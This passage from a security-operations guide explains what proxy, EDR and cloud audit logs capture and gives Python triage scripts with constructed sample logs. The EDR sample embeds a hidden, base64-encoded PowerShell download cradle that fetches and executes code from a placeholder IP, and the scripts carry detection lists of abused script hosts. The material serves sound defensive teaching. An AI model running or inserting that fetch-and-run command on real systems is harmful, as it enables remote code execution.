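    for ip, reasons in profile_clients(SAMPLE_DNS_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Entropy is reported alongside the NXDOMAIN rate rather than used as its own trigger: on eleven-character labels it separates dictionary words from random strings only weakly, and the failure rate is the stronger signal.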

Proxy/Web Filter Logs

Web proxy logs record all HTTP/HTTPS traffic passing through the organization’s proxy. They provide visibility into web-based attacks, policy violations, and C2 traffic.

What They Capture

  • Source IP and username (if authenticated proxy)
  • URL (full URL for HTTP; for HTTPS only the hostname, taken from the CONNECT request or the TLS SNI, unless the proxy performs TLS inspection)
  • User-Agent string
  • HTTP method and status code
  • Content type and bytes transferred
  • Block/Action (allowed, blocked, warned)

Analyst Use Cases

  • C2 traffic: Beacons to known C2 infrastructure. Regular intervals, consistent payload sizes, unusual User-Agents.
  • Phishing URL visits: Users clicking links in phishing emails. The proxy log confirms the user visited the site.
  • Data exfiltration: Large POST requests to external domains (especially cloud storage/file sharing).
  • Policy violations: Tor traffic, anonymizer sites, unauthorized cloud services (shadow IT).
  • User-Agent anomalies: Empty User-Agent, non-browser User-Agent, or User-Agent matching an outdated browser version = automation tooling or malware.
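The C2 beaconing, bulk-upload and User-Agent use cases above, run over proxy log lines as an added example that is not code from the original page or from any proxy vendor. It assumes proxy logs normalised to CSV (timestamp, src_ip, user, method, host, status, bytes_out, user_agent), which Squid and the common commercial exports can be mapped to; the jitter threshold, the upload size limit, the browser-prefix rule and the sample lines are constructed assumptions.

```python
"""Beaconing, bulk-upload and User-Agent triage over web proxy log lines.

Added example, not from the original page. Assumes proxy logs normalised to
CSV columns timestamp, src_ip, user, method, host, status, bytes_out,
user_agent. Thresholds, hostnames and sample lines are constructed.
"""
import csv
import io
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

MIN_REQUESTS = 6          # enough intervals to judge regularity
MAX_JITTER_CV = 0.15      # stdev/mean of inter-request gaps; browsing is far higher
MIN_PERIOD_S = 30         # ignore sub-30-second API chatter
LARGE_POST_BYTES = 20_000_000


def beacon_candidates(rows):
    """Return {(src_ip, host): mean_period_s} for request streams whose gaps
    are nearly constant (coefficient of variation <= MAX_JITTER_CV)."""
    times = defaultdict(list)
    for r in rows:
        times[(r["src_ip"], r["host"])].append(datetime.fromisoformat(r["timestamp"]))
    found = {}
    for key, ts in times.items():
        if len(ts) < MIN_REQUESTS:
            continue
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean >= MIN_PERIOD_S and statistics.pstdev(gaps) / mean <= MAX_JITTER_CV:
            found[key] = round(mean, 1)
    return found


def large_uploads(rows):
    return [r for r in rows if r["method"] == "POST" and int(r["bytes_out"]) >= LARGE_POST_BYTES]


def odd_user_agents(rows):
    """Empty or non-browser agents: scripts, malware or admin tooling (assumed prefix rule)."""
    return [r for r in rows if not r["user_agent"].startswith("Mozilla/")]


def triage(log_text):
    rows = list(csv.DictReader(io.StringIO(log_text)))
    return {
        "beacons": beacon_candidates(rows),
        "large_uploads": [(r["src_ip"], r["host"], int(r["bytes_out"])) for r in large_uploads(rows)],
        "odd_user_agents": sorted({(r["src_ip"], r["user_agent"]) for r in odd_user_agents(rows)}),
    }


# Constructed sample log
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
_BASE = datetime(2024, 3, 1, 10, 0, 0)


def _row(offset_s, src, method, host, bytes_out, ua):
    ts = (_BASE + timedelta(seconds=offset_s)).isoformat()
    return f"{ts},{src},jdoe,{method},{host},200,{bytes_out},{ua}"


SAMPLE_PROXY_LOG = "\n".join(
    ["timestamp,src_ip,user,method,host,status,bytes_out,user_agent"]
    # implant checking in roughly every 60 s with a little jitter
    + [_row(t, "10.1.5.23", "GET", "cdn-update.example.org", 412, BROWSER_UA)
       for t in (0, 61, 119, 181, 240, 299, 361, 420)]
    # a person reading the news: bursty, irregular
    + [_row(t, "10.1.7.40", "GET", "news.example.com", 0, BROWSER_UA)
       for t in (0, 3, 5, 47, 130, 131, 600)]
    + [_row(900, "10.1.9.9", "POST", "files.example-share.com", 52_000_000, "curl/8.4.0"),
       _row(905, "10.1.2.2", "GET", "203.0.113.7", 0, "")]
) + "\n"

if __name__ == "__main__":
    for section, value in triage(SAMPLE_PROXY_LOG).items():
        print(section, value)
```

The coefficient of variation, not the raw period, is what separates an implant from a person: a beacon with a 60-second sleep and 5% jitter still scores below 0.1, while a human reading pages produces gaps that vary by an order of magnitude. Real implants add larger jitter precisely to defeat this, so treat the threshold as tunable and combine it with consistent response sizes.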

EDR Telemetry

Endpoint Detection and Response (EDR) logs combine traditional event logging, Sysmon-like telemetry, behavioral analytics, and network visibility into a single platform.

What They Capture

  • Process tree — every process, parent process, child process, command line
  • File operations — create, modify, delete, rename with full paths
  • Registry operations — key create, modify, delete
  • Network connections — per-process outbound connections with full IP/port detail
  • Memory access — process handle operations, injection detection
  • Script execution — PowerShell script block logging, VBS macro detection
  • User behavior — logins, privilege changes, authentication patterns

Analyst Use Cases

  • Process ancestry analysis: winword.exe → cmd.exe → powershell.exe: an Office document spawning a shell (T1204.002 Malicious File, followed by T1059.003 and T1059.001). Office applications have no legitimate reason to launch cmd, powershell, wscript, mshta, rundll32 or regsvr32.
  • Remote thread creation: explorer.exe creating a remote thread in svchost.exe = process injection (T1055).
  • LSASS access: EDRs flag processes opening a handle to LSASS with memory-read rights from outside an allowlist; alerting on every handle is too noisy, because many system processes query LSASS with limited-information rights.
  • Beacon detection: Network connections at regular intervals with consistent payload sizes over a sustained period.
  • Fileless malware detection: PowerShell running encoded or download-cradle commands whose parent (an Office application, a service, wmiprvse.exe) does not justify scripting. PowerShell script block logging (Event ID 4104) shows the decoded content of what actually ran.
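The ancestry and encoded-PowerShell use cases above, as an added example that is not code from the original page or from any EDR vendor. It assumes process events normalised to dicts with pid, ppid, image and cmdline, which EDR APIs and Sysmon Event ID 1 exports both provide; the Office and script-host lists, the recognised spellings of -EncodedCommand and the sample events are constructed assumptions.

```python
"""Process-ancestry and encoded-PowerShell triage over EDR process events.

Added example, not from the original page or from any EDR. Assumes events
normalised to dicts with pid, ppid, image, cmdline. Application lists and
sample events are constructed.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "onenote.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# PowerShell accepts abbreviations of -EncodedCommand; these are the usual ones (assumed list).
ENCODED_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events_by_pid, pid):
    """Walk ppid links back to the root; returns image basenames, root first."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)                                  # guard against PID-reuse loops
        chain.append(basename(events_by_pid[pid]["image"]))
        pid = events_by_pid[pid]["ppid"]
    return list(reversed(chain))


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process_events(events):
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(by_pid, e["pid"])
        name = chain[-1]
        reasons = []
        if name in SCRIPT_HOSTS and any(a in OFFICE_APPS for a in chain[:-1]):
            reasons.append("script host descended from an Office application")
        decoded = decode_encoded_command(e["cmdline"]) if name in {"powershell.exe", "pwsh.exe"} else None
        if decoded is not None:
            reasons.append(f"encoded PowerShell: {decoded}")
        if reasons:
            findings.append({"pid": e["pid"], "chain": " > ".join(chain), "reasons": reasons})
    return findings


# Constructed sample: a macro in Invoice.docm launches cmd, which launches an
# encoded PowerShell download cradle; the other processes are benign.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\bob\\Downloads\\Invoice.docm"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc " + ENCODED},
    {"pid": 400, "ppid": 300, "image": PS_EXE, "cmdline": "powershell -nop -w hidden -enc " + ENCODED},
    {"pid": 500, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    {"pid": 700, "ppid": 100, "image": PS_EXE, "cmdline": "powershell.exe"},   # interactive, benign
]

if __name__ == "__main__":
    for finding in triage_process_events(SAMPLE_EVENTS):
        print(finding["pid"], finding["chain"], finding["reasons"])
```

Decoding the payload inline matters for triage speed: the analyst sees the download cradle and the C2 address in the alert itself instead of pasting base64 into a decoder, and the decoded text is what to pivot on in proxy and DNS logs.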

Cloud Audit Logs

AWS CloudTrail

Records API calls made to AWS services. Management (control-plane) events are logged by default; S3 object-level and Lambda data events must be enabled separately or GetObject on a sensitive bucket never appears. Each record carries userIdentity, sourceIPAddress, userAgent, requestParameters, responseElements and errorCode, so denied calls (AccessDenied) are visible too and are themselves a reconnaissance signal.

Key events:

  • ConsoleLogin — AWS console login. Geolocate sourceIPAddress and check additionalEventData.MFAUsed and responseElements.ConsoleLogin (Success or Failure). Console logins use a password or federated SSO, never an access key; access-key use shows up as API calls with userIdentity.accessKeyId.
  • CreateAccessKey — New long-lived credential, especially when created for a user other than the caller. Attacker establishing persistence (T1098.001).
  • CreateUser / CreateRole / AttachUserPolicy / PutUserPolicy — Unexpected IAM resource or policy creation = persistence or privilege escalation.
  • RunInstances — New compute launched (cryptocurrency mining, C2 infrastructure). Watch for unusual regions and instance types.
  • AuthorizeSecurityGroupIngress / ModifySecurityGroupRules — Security group change opening ports, above all 22 or 3389 to 0.0.0.0/0.
  • PutBucketPolicy / PutBucketAcl / DeleteBucketPublicAccessBlock — S3 access policy changes that can expose data.
  • AssumeRole — Role assumption (eventSource sts.amazonaws.com), including cross-account. The resulting session then appears as userIdentity.type AssumedRole in later records.
  • KMS operations (Decrypt, GenerateDataKey, ScheduleKeyDeletion, DisableKey) — Suspicious from a principal that never uses KMS normally; key deletion or disabling is a ransomware precursor.
  • StopLogging / DeleteTrail / UpdateTrail / PutEventSelectors, and GuardDuty DeleteDetector — Attacker disabling the audit trail (T1562.008). Any instance is high-priority.
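The CloudTrail rules above, as an added example that is not code from the original page or from AWS. It assumes the standard CloudTrail JSON layout ({"Records": [...]}) with userIdentity, requestParameters, responseElements and additionalEventData; the record set, account ID, ARNs and the sensitive-port list are constructed placeholders.

```python
"""Triage rules over AWS CloudTrail records.

Added example, not from the original page or from AWS. Assumes standard
CloudTrail JSON. Records, account IDs and ARNs below are constructed.
"""
import json

SENSITIVE_PORTS = {22, 3389}          # assumption: ports that must never be world-open
LOGGING_TAMPER = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors", "DeleteDetector"}


def caller_name(rec):
    """IAM user name, or the session name at the end of an assumed-role ARN."""
    ident = rec.get("userIdentity") or {}
    return ident.get("userName") or ident.get("arn", "").rsplit("/", 1)[-1]


def open_ingress_rules(params):
    """Yield (from_port, to_port, cidr) for world-open ranges in an
    AuthorizeSecurityGroupIngress request. Ports are None for protocol -1 (all)."""
    for perm in (params.get("ipPermissions") or {}).get("items", []):
        for rng in (perm.get("ipRanges") or {}).get("items", []):
            if rng.get("cidrIp") == "0.0.0.0/0":
                yield perm.get("fromPort"), perm.get("toPort"), "0.0.0.0/0"
        for rng in (perm.get("ipv6Ranges") or {}).get("items", []):
            if rng.get("cidrIpv6") == "::/0":
                yield perm.get("fromPort"), perm.get("toPort"), "::/0"


def triage_cloudtrail(trail_json):
    """Return (eventTime, eventName, caller, sourceIP, reason) tuples."""
    findings = []
    for rec in json.loads(trail_json)["Records"]:
        if rec.get("errorCode"):
            continue                       # denied calls are a separate (recon) signal
        name, who, src = rec["eventName"], caller_name(rec), rec.get("sourceIPAddress")
        params = rec.get("requestParameters") or {}
        resp = rec.get("responseElements") or {}
        extra = rec.get("additionalEventData") or {}
        if name == "ConsoleLogin" and resp.get("ConsoleLogin") == "Success":
            if extra.get("MFAUsed") != "Yes":
                findings.append((rec["eventTime"], name, who, src, "console login without MFA"))
        elif name == "CreateAccessKey":
            target = params.get("userName", who)
            if target != who:
                findings.append((rec["eventTime"], name, who, src,
                                 f"created access key for another user: {target}"))
        elif name == "AuthorizeSecurityGroupIngress":
            for lo, hi, cidr in open_ingress_rules(params):
                if lo is None or any(lo <= p <= hi for p in SENSITIVE_PORTS):
                    findings.append((rec["eventTime"], name, who, src,
                                     f"{params.get('groupId')} opened {lo}-{hi} to {cidr}"))
        elif name in LOGGING_TAMPER:
            findings.append((rec["eventTime"], name, who, src, "audit logging tampered (T1562.008)"))
    return findings


# Constructed sample trail: one session by "alice" from 198.51.100.23 doing
# four bad things, plus a benign rule change and a denied call.
_ACCT = "123456789012"
_ALICE = {"type": "IAMUser", "userName": "alice", "arn": f"arn:aws:iam::{_ACCT}:user/alice"}
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2024-03-01T09:58:10Z", "eventSource": "signin.amazonaws.com", "eventName": "ConsoleLogin",
     "userIdentity": _ALICE, "sourceIPAddress": "198.51.100.23",
     "responseElements": {"ConsoleLogin": "Success"}, "additionalEventData": {"MFAUsed": "No"}},
    {"eventTime": "2024-03-01T10:02:44Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": _ALICE, "sourceIPAddress": "198.51.100.23", "requestParameters": {"userName": "backup-svc"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE", "status": "Active"}}},
    {"eventTime": "2024-03-01T10:05:01Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "AssumedRole", "arn": f"arn:aws:sts::{_ACCT}:assumed-role/Admin/alice"},
     "sourceIPAddress": "198.51.100.23",
     "requestParameters": {"groupId": "sg-0123456789abcdef0", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 3389, "toPort": 3389, "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventTime": "2024-03-01T10:06:30Z", "eventSource": "ec2.amazonaws.com",
     "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "IAMUser", "userName": "netops", "arn": f"arn:aws:iam::{_ACCT}:user/netops"},
     "sourceIPAddress": "10.0.0.5",
     "requestParameters": {"groupId": "sg-0fedcba9876543210", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443, "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventTime": "2024-03-01T10:09:12Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
     "userIdentity": _ALICE, "sourceIPAddress": "198.51.100.23",
     "requestParameters": {"name": f"arn:aws:cloudtrail:us-east-1:{_ACCT}:trail/org-trail"}},
    {"eventTime": "2024-03-01T10:10:00Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "bob", "arn": f"arn:aws:iam::{_ACCT}:user/bob"},
     "sourceIPAddress": "10.0.0.9", "requestParameters": {}, "errorCode": "AccessDenied"},
]})

if __name__ == "__main__":
    for finding in triage_cloudtrail(SAMPLE_TRAIL):
        print(*finding, sep=" | ")
```

The four findings share a caller and a source address, which is the correlation that turns four medium alerts into one incident: a console login without MFA from an unfamiliar IP, followed within minutes by persistence, exposure and log tampering, is the canonical compromised-credential timeline.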

Azure Activity Log

Records control-plane (Azure Resource Manager) operations on Azure resources. Identity events live elsewhere: Entra ID sign-in and audit logs cover authentication, directory role changes and app consent, and data-plane access (Key Vault reads, storage access) needs diagnostic settings on each resource.

Key events:

  • Microsoft.Network/networkSecurityGroups/securityRules/write — NSG rule modification
  • Microsoft.Compute/virtualMachines/extensions/write — VM extension installation (Custom Script Extension and RunCommand are code execution as SYSTEM/root on the VM; persistence and lateral movement)
  • Microsoft.Authorization/roleAssignments/write — RBAC role assignment change (Owner or Contributor at subscription scope is the one to alert on)
  • Microsoft.ManagedIdentity/userAssignedIdentities/assign/action — Managed identity attached to a resource, a privilege escalation path when the identity holds more rights than the caller
  • Microsoft.Insights/diagnosticSettings/delete — Diagnostic (log export) settings removed: attacker disabling logging (T1562.008)

GCP Cloud Audit Logs

  • google.iam.admin.v1.CreateServiceAccount / google.iam.admin.v1.CreateServiceAccountKey — Service account or long-lived key creation outside of automation pipelines (T1098.001).
  • v1.compute.instances.insert — Unexpected VM creation (cryptomining, C2).
  • storage.setIamPermissions on a bucket (the storage.buckets.setIamPolicy permission) — Bucket permission changes, above all grants to allUsers or allAuthenticatedUsers.
  • SetIamPolicy on a project or organisation (cloudresourcemanager.googleapis.com) — Project-wide role grants; Owner or Editor additions are critical.
  • Caveat: Admin Activity audit logs are always on, but Data Access audit logs (reads and writes of data, including storage.objects.get) are off by default for most services and must be enabled per service or the object-level activity never appears.

Log Correlation — Putting It All Together

A single log source is rarely enough. The power comes from correlation:

Scenario | Sources Needed
User clicked phishing link | Proxy log (proves the visit) + DNS log (domain lookup) + EDR (process creation, file download) + Email gateway (original message)
Lateral movement | Windows Security 4624/4648 (logon from source) + Sysmon 3 (network connection) + Sysmon 1 (process creation on destination)
C2 beaconing | DNS log (query to C2 domain) + Proxy log (HTTP beacon to same domain) + Sysmon 3 (network connection) + Firewall log (allowed outbound)
Ransomware execution | EDR (process tree: script → downloader → encryptor) + File operations (mass file modifications and extension changes) + Scheduled task creation (persistence) + DNS (phishing domain visited)
Data exfiltration | DNS log (large TXT queries) + Proxy log (large POST requests) + Sysmon 3 (outbound connections) + Firewall log (allowed outbound to unusual port)
